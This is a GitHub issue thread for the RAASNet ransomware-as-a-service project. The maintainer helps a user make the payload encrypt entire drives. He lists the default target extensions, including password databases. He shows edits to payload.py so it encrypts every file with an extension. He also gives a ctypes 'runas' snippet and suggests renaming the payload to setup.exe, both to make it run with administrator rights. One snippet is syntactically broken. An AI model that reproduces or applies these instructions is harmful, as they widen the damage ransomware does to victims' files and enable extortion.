### ISSUE TITLE
working directory

### ISSUE THREAD

**Issue by ahmedtsadek** [leonv024/RAASNet#6]
i am trying to add other partitions of the hard drive but cant get it to encrypt the files in them it always encrypt the downloads,desktop,etc..
anyway to encrypt the full harddrive?

**Comment by leonv024** [comment]
Try this:
Change the working directory to "D:/" (or any other drive) and the target directory to a dot: .

**Comment by ahmedtsadek** [comment]
Great will test that, thanks

**Comment by ahmedtsadek** [comment]
Hey me again,
I tried the above method and I found that I cant have more than one drive, and the when i put the target directory to a . "dot" only the files on the root of the drive is encrypted but the files inside folders is not encrypted.
Also i tried to modify the payload after being generated to add more drives with different methods none of them worked even tried to use the method you use to encrypt the user folders ['Desktop',
'Downloads'
]
it didnt work with the drives.

**Comment by leonv024** [comment]
I'll take a look.

**Comment by leonv024** [comment]
I added one extra debug line while testing to see the path of the subdir.

This shows that it DOES target the subfolders in the Root but the debug only tells you the files being targeted. (See image).

<img width="839" alt="raasnet test other drive" src="https://user-images.githubusercontent.com/33411715/67141143-eb4d3a80-f260-11e9-8ab9-2a758fe82698.png">

Therefor, I was unable to reproduce your issue.

The reason your files are not being encrypted might has something to do with the targeted extensions.

With default settings, the payload will look for and target the following extensions:
```
txt
ppt
pptx
doc
docx
gif
jpg
png
ico
mp3
ogg
csv
xls
exe
pdf
ods
odt
kdbx
kdb
mp4
flv
iso
zip
tar
tar.gz
rar
```

You might want to modify "CUSTOM FILE EXTENSIONS" to make the script target them:

Or modify `payload.py` to make it target anything with a . (dot) in it. That way it'll encrypt anything with an extension.
```Python
# Encrypt said extensions
for i in ext:
    if name.endswith(i.lower()): # <--- Change this.
        print('[FOUND] %s' % name)
        try:
            encrypt_file(os.path.join(path, name), key)
```

```Python
# Encrypt anything with an extension
#for i in ext: # <--- Remove this line to disable looping through extensions
if '.' in name): # <--- To this.
    print('[FOUND] %s' % name)
    try:
        encrypt_file(os.path.join(path, name), key)
```

About the multi-drive targeting. I'll add that later. It's on my todo list.

**Comment by ahmedtsadek** [comment]
So I tried again and with the debug option as you mentioned but i dont know why it didnt show the console and it only encrypts sub folders if the payload is run as administrator

**Comment by ahmedtsadek** [comment]
any news about multi-drive? and can you help me with the run as administrator issue?

**Comment by leonv024** [comment]
I've been away for nearly 2 weeks with no time to work on this project.
Today I had the time to take a look.

I've `found a fix` for the run as admin issue. So here we go:

First:
The payload should be able to read and modify the file.
There is no bypass without exploiting the system, which would be fixed quickly if I post a open-source privilege evaluation bypass here.

However, I do have a fix for requiring admin privileges to execute the payload.

I'll update the payload with a "Run as administrator..." feature, after testing this feature, so.. very soon.

Fix:
```python
def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

if is_admin():
    try:
        connector()
    except KeyboardInterrupt:
        sys.exit(0)
else:
    ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, __file__, None, 1)
```

Quick fix would be `renaming payload.exe to setup.exe`. That way it'll ask to run as admin as well.

Second:
Today, I've been working on the backend of RAASNet and implemented a permission, profile and ban system (for account, IP and region).
These updates took effect without you needing to updating your client.

I had to secure the server and autoban because the Chinese and Russians are bashing my server, hihi.

So, no RAASNet multi-drive update yet, but it's on the list.
I still only have the weekends to work on my projects.

**Comment by leonv024** [comment]
New feature is now available: Run as administrator.
You can update and test it. It should resolve the permission error.

Note that sometimes not even the administrator can modify the file.
For example: in case of a mounted ISO, the files are Read Only.

But as you said earlier, running it as administrator resolved the issue.

If it still doesn't work, feel free to contact me again.
